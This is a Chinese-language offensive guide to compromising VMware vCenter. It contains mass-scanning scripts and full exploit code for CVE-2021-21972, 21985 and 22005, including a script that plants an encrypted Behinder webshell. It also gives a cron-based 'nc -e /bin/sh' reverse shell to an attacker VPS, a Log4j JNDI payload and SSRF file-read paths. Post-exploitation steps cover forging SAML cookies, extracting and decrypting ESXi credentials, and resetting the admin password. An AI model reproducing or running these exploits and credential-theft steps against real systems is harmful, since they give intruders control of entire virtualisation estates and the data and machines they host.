前言
VMware vCenter是VMware公司推出的集中化虚拟化管理平台。它是VMware vSphere虚拟化解决方案的核心组件之一。vCenter的主要功能是管理和监控整个vSphere虚拟化基础架构,包括多个ESXi主机和虚拟机。
vSphere
vSphere是VMware的虚拟化平台的总称,它是一套完整的虚拟化解决方案,包括了多个组件和功能,用于构建和管理虚拟化环境。vSphere的主要组件包括:
- VMware ESXi(以前称为ESX):ESXi是vSphere的核心部分,它是一种裸机虚拟化操作系统,直接安装在物理服务器上,取代传统的操作系统,如Windows或Linux。一旦 ESXi 安装在物理服务器上并启动,它会在后台自动运行,并立即开始管理和运行虚拟机,不需要通过登录界面进行交互。
- VMware vCenter Server:vCenter是vSphere的集中式管理平台,用于管理和监控多个ESXi主机上的虚拟机。vCenter提供 Web 界面或者 vSphere 客户端供管理员登录,然后通过该界面来管理整个 vSphere 环境。
平常看到的“VMware® vSphere”登录界面,通常是指vCenter的登录界面。ESXi 没有单独的登录界面
vSphere = ESXi + vCenter
fofa搜索
title="+ ID_VC_Welcome +"查看vcenter版本
方法1:
/sdk/vimServiceVersions.xml如下代表版本为6.7.3。
方法2:
通过调用 VMWare Sphere 组件的 SOAP API,可以获取其版本信息,XML 数据如下:
POST /sdk HTTP/1.1
Host: portal.vpsssd.vn:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent
xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
漏洞
CVE-2021-21972 文件上传
漏洞介绍
vSphere Client(HTML5在vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenterServer发送精心构造的请求,从而在服务器上写入webshell,最终造成远程任意代码执行。
影响范围
- vCenter Server7.0 =< 7.0.U1c
- vCenter Server6.7 =< 6.7.U3l
- vCenter Server6.5 =< 6.5.U3n
漏洞检测
访问下面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞
/ui/vropspluginui/rest/services/uploadova
import requests, threading
import concurrent.futures
lock = threading.Lock() # 创建互斥锁
requests.packages.urllib3.disable_warnings()
from colorama import init,Fore
init(autoreset=True)
lock = threading.Lock()
def run(target):
try :
target = target + "/ui/vropspluginui/rest/services/uploadova"
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
resp = requests.get(url=target, headers=header, verify=False, proxies={'https':'http://127.0.0.1:8080'})
code = resp.status_code
if code == 405:
with lock:
print("[+]%s可能存在漏洞" %target)
else:
with lock:
print("[-]%s不存在漏洞" %target)
except Exception as e:
with lock:
print("[-]%s不存在漏洞" %target)
if __name__ == "__main__":
urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8")]
max_workers = 800
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(run, urls)漏洞利用
vckiller_windows_amd64.exe -u https://ip:8443 -m 21972 -f shell.jsp
CVE-2021-21985 RCE
漏洞介绍
默认启用的 Virtual SAN Health Check 插件(vsan-h5-client.zip)/rest/*接口存在未授权访问,可利用不安全的反射调用实现 RCE。
影响版本
- 7.0 <= vCenter Server < 7.0 U2b
- 6.7 <= vCenter Server < 6.7 U3n
- 6.5 <= vCenter Server < 6.5 U3p
- 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
- 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1
漏洞检测
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 54.xx.xx.157
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88
{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}
当返回如下,说明漏洞存在
命令执行
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import sys
import zipfile
from urllib.parse import urlparse
import zlib
import json
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies={'https':'http://127.0.0.1:8080'}
def banner():
print("""
==============================================================
_____ _ _____ _____ ______
/ ____| | | | __ \ / ____| ____|
__ _| | ___ _ __ | |_ ___ _ __ | |__) | | | |__
\ \ / / | / _ \ '_ \| __/ _ \ '__| | _ /| | | __|
\ V /| |___| __/ | | | || __/ | | | \ \| |____| |____
\_/ \_____\___|_| |_|\__\___|_| |_| \_\\_____|______|
Powered by r0cky Team ZionLab
==============================================================
""")
def create_xml():
print("[*] Create Xml to offline_bundle.xml ...")
context = """<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[ {cmd} 2>&1 ]]></value>
</list>
</constructor-arg>
</bean>
<bean id="is" class="java.io.InputStreamReader">
<constructor-arg>
<value>#{pb.start().getInputStream()}</value>
</constructor-arg>
</bean>
<bean id="br" class="java.io.BufferedReader">
<constructor-arg>
<value>#{is}</value>
</constructor-arg>
</bean>
<bean id="collectors" class="java.util.stream.Collectors"></bean>
<bean id="system" class="java.lang.System">
<property name="whatever" value="#{ system.setProperty("output", br.lines().collect(collectors.joining("\n"))) }"/>
</bean>
</beans>
""".replace("{cmd}", cmd)
with open('offline_bundle.xml', 'w') as wf:
wf.write(context)
wf.flush()
def create_zip():
print("[*] Create Zip to offline_bundle.zip ...")
with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
zp.write('offline_bundle.xml')
def toBase64():
with open('offline_bundle.zip', 'rb') as rf:
return base64.b64encode(rf.read())
def poc1(url):
ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
ssrf = ssrf_str.format(bytes.decode(toBase64()))
print ("[*] Get XML to SystemProperties ...")
target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"
data = {"methodInput":[[ssrf]]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
def poc2(url):
print("[*] getProperty ...")
target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"
data = {"methodInput": ["output", None]}
r = requests.post(target, data=json.dumps(data), headers=headers,
verify=False, proxies=proxies)
if "result" in r.json():
print("[+] Command:", cmd)
print(r.json()['result'])
else:
print ("[-] send payload failed.")
headers = {"Content-Type": "application/json"}
def main(url):
try:
create_xml()
create_zip()
poc1(url)
poc2(url)
except:
print("[-] send payload failed.")
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
up = urlparse(target)
target = up.scheme + "://" + up.netloc
main(target)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
反弹shell:CVE-2021-21985: VMware vCenter Server RCE复现-腾讯云开发者社区-腾讯云
CVE-2021-22005 文件上传
漏洞介绍
2021年9月22日,VMware 官方发布安全公告,披露了包括 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞在内的多个中高危严重漏洞。攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。
影响范围
- VMware vCenter Server 7.0系列 < 7.0 U2c
- VMware vCenter Server 6.7系列 < 6.7 U3o
- VMware vCenter Server 6.5系列 不受漏洞影响
漏洞检测
访问 /analytics/telemetry/ph/api/level 地址判断服务器是否受影响
- 如果服务器以 200/OK 和响应正文中除“OFF”以外的任何内容(例如“FULL”)进行响应,则它很容易受到攻击。
- 如果它以 200/OK 和“OFF”的正文内容响应,则它很可能不易受到攻击,并且也未修补且未应用任何变通方法。
- 其他情况说明漏洞不存在
import requests, threading
import concurrent.futures
lock = threading.Lock() # 创建互斥锁
requests.packages.urllib3.disable_warnings()
from colorama import init,Fore
init(autoreset=True)
lock = threading.Lock()
def run(target):
try :
target = target + "/analytics/telemetry/ph/api/level?_c=test"
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
resp = requests.get(url=target, headers=header, verify=False, proxies={'https':'http://127.0.0.1:8080'})
code = resp.status_code
if code == 200 and "OFF" not in resp.text and "FULL" in resp.text:
with lock:
print("[+]%s可能存在漏洞" %target)
else:
with lock:
print("[-]%s不存在漏洞" %target)
except Exception as e:
with lock:
print("[-]%s不存在漏洞" %target)
if __name__ == "__main__":
urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8")]
max_workers = 800
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(run, urls)漏洞利用
import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "<")
_str = _str.replace(">", ">")
_str = _str.replace("\"", """)
return _str
def str_to_escaped_unicode(arg_str):
escaped_str = ''
for s in arg_str:
val = ord(s)
esc_uni = "\\u{:04x}".format(val)
escaped_str += esc_uni
return escaped_str
def createAgent(target, agent_name, log_param):
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
headers = { "Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close" }
json_data = { "manifestSpec":{},
"objectType": "a2",
"collectionTriggerDataNeeded": True,
"deploymentDataNeeded":True,
"resultNeeded": True,
"signalCollectionCompleted":True,
"localManifestPath": "a7",
"localPayloadPath": "a8",
"localObfuscationMapPath": "a9" }
requests.post(url, headers=headers, json=json_data, verify=False)
def generate_manifest(webshell_location, webshell):
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
#set($orig_log = $appender.getFile())##
#set($logger = $GLOBAL-logger.logger.parent)##
$appender.setFile("%s")##
$appender.activateOptions()##
$logger.warn("%s")##
$appender.setFile($orig_log)##
$appender.activateOptions()##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (webshell_location, webshell)
return manifestData
def arg():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help = "Target", required = True)
args = parser.parse_args()
target = args.target
print("[*] Target: %s" % target)
return target
def exec():
target = arg()
# Variables
webshell_param = id_generator(6)
log_param = id_generator(6)
agent_name = id_generator(6)
shell_name = "Server.jsp"
webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
webshell = str_to_escaped_unicode(webshell)
manifestData = generate_manifest(webshell_location,webshell)
print("[*] Creating Agent")
createAgent(target, agent_name, log_param)
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
headers = {"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close"}
json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(url, headers=headers, json=json_data, verify=False)
#webshell连接地址
url = "%s/idm/..;/%s" % (target, shell_name)
code = requests.get(url=url, headers=headers,verify=False).status_code
if code != "404":
print("webshell地址: %s" % url)
print("[*]冰蝎3.0 Webshell连接密码: rebeyond" )
else:
print("未获取到webshell地址")
if __name__ == '__main__':
exec()CVE-2021-22005poc.py -t https://103.154.100.22:8443
反弹shell
还有另外一种了利用方式,直接将反弹脚本写入计划任务
curl -kv "https:/xx.xx.xx.xx/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh vpsip地址 6666"接收反弹shell
vCenter SSRF 文件读取漏洞
漏洞描述
VMware vCenter v 7.0.x 的某些版本中存在未授权 SSRF 漏洞,该漏洞源于h5-vcav-bootstrap-service组件的getProviderLogo函数中未对provider-logo参数做校验,直接拼接之后进行URL请求,可通过file协议读取任意文件。暂无CVE编号
影响版本
- VMware vCenter Server =7.0.2.00100
- VMware vCenter Server =7.0.2.00000
- 7.0.1.1
漏洞检测
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://c:\windows\System32\drivers\etc\hosts
#读取 postgresql 配置文件:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/vmware-vpx/vcdb.propertiesGET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/1.1
Host: 54.xx.xx.157
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
vCenter Arbitrary文件读取
漏洞详情
VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件。
影响版本
- VMware vCenter 6.5.0a-f
- 安全版本:VMware vCenter 6.5u1
漏洞复现
https://ip/eam/vib?id=/etc/passwd
/etc/shadow不能读取
VCenter Log4j JNDI RCE CVE-2021-44228
漏洞详情
VMware vCenter Log4j JNDI RCE 是一个潜在的远程代码执行漏洞,它影响了VMware vCenter Server 6.7。这个漏洞是由于vCenter Server平台上的Log4j配置不当导致的。攻击者可以利用这个漏洞通过远程方式执行任意代码。漏洞触发点为XFF头部
漏洞检测
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: ${jndi:ldap://x.25vk6n.ceye.io}
Connection: close
我这里没有找到存在漏洞的靶机所以无记录,只演示测试过程。因为漏洞本质是属于Log4j,vcenter引用了log4j这个组件,所以如果有该漏洞,普通的lo4j检测工具应该就能检测出来
漏洞利用
工具使用:VcenterKiller
更多细节参考:
vcenter综合利用工具
VcenterKiller:GitHub - Schira4396/VcenterKiller: 一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接,只有漏洞利用,无漏洞检测功能。
获取vcenter-web控制台权限
上次获取了vcenter所在的服务器权限,但还是登录不上控制平台,要登录还需要密码。
这时候就有两个思路:
- 读取vCenter cookie,通过解密脚本解密,登上控制台。
- 直接通过vdcadmintool.exe修改密码。但是修改之后无法获取原来的密码,管理员会发现密码被改
cookie登录
SAML 证书登录实质上就是获取cookie然后登录web控制台
vSphere 5.0 版本引入了 SSO,支持使用 SAML 作为授权服务支持。当用户登录服务时,该服务会将身份验证请求转发给 SAML 。SAML 验证用户凭据是否正确以及他们是否有权访问指定的服务。
在 vCenter 中从 /storage/db/vmware-vmdir/data.mdb 提取 IdP 证书,为管理员用户创建 SAML 请求,最后使用 vCenter server 进行身份验证并获得有效的管理员 cookie。
首先需要从 vCenter 获得数据库文件:
- Linux:/storage/db/vmware-vmdir/data.mdb
- Windows:C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
利用 SAML 解密脚本生成 Cookie,建议使用kali运行脚本。脚本中的模块需要先安装编译工具和OpenLDAP开发包才能使用
sudo apt install python3-dev libldap2-dev libsasl2-dev libssl-dev
#安装依赖
pip3 install -r requirements.txt运行
python3 vcenter_saml_login.py -p data.mdb -t vcenterip我这里报错了,可参考:Vcenter实战利用方式总结-腾讯云开发者社区-腾讯云
不重置获取密码
1. 查看域
#Linux
/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost
#windows
C:\Program Files\VMware\vCenter Server\vmafdd\vmafd-cli get-domain-name --server-name localhost
#由于路径中间存在空格,导致识别不了,使用双引号对含有空格的路径进行单独处理
C:\PROGRA~1\VMware\"vCenter Server"\vmafdd\vmafd-cli get-domain-name --server-name localhost
2. 获取解密key
#Linux
cat /etc/vmware-vpx/ssl/symkey.dat
#Windows
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
3. 获取数据库账号密码
vcenter默认数据库文件存放在vcdb.properties,配置文件中有数据库的明文账号密码
#Linux
cat /etc/vmware-vpx/vcdb.properties
cat /etc/vmware/service-state/vpxd/vcdb.properties
#Windows
type C:\ProgramData\VMware\"VMware VirtualCenter"\vcdb.properties
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
默认是postgresql数据库,只能在vCenter服务器本地登录,执行语句查询ESXI的密码
#psql默认存放位置
Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
Linux:
#其中x版本号,根据实际情况填写
cd /opt/vmware/vpostgres/x版本/bin/
#执行语句查询
echo "psql密码" | psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;"
将password字段复制到password.enc文件中
4. 使用脚本解密
GitHub - shmilylty/vhost_password_decrypt: vhost password decrypt
- symkey.dat为第而步获取的解密key
python decrypt.py symkey.dat password.enc password.txt执行脚本后,会输出一个password.txt,里面存放着对应 ip_address 的 ESXI 机器密码
我这里输出为空
5. 使用password.txt中的密码登录web控制台
重置密码
比较快的一种方法,但是修改之后无法获取原来的密码,管理员会发现密码被改
#Linux
/usr/lib/vmware-vmdir/bin/vdcadmintool
#Windows
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe选择 3 选项,输入默认 [email protected] (需要管理员权限),这里又失败了。。
获取虚拟机权限
登录web控制台后,想要获取某个虚拟机的权限,选择目标虚拟机,操作生成快照,找快照文件,读取hash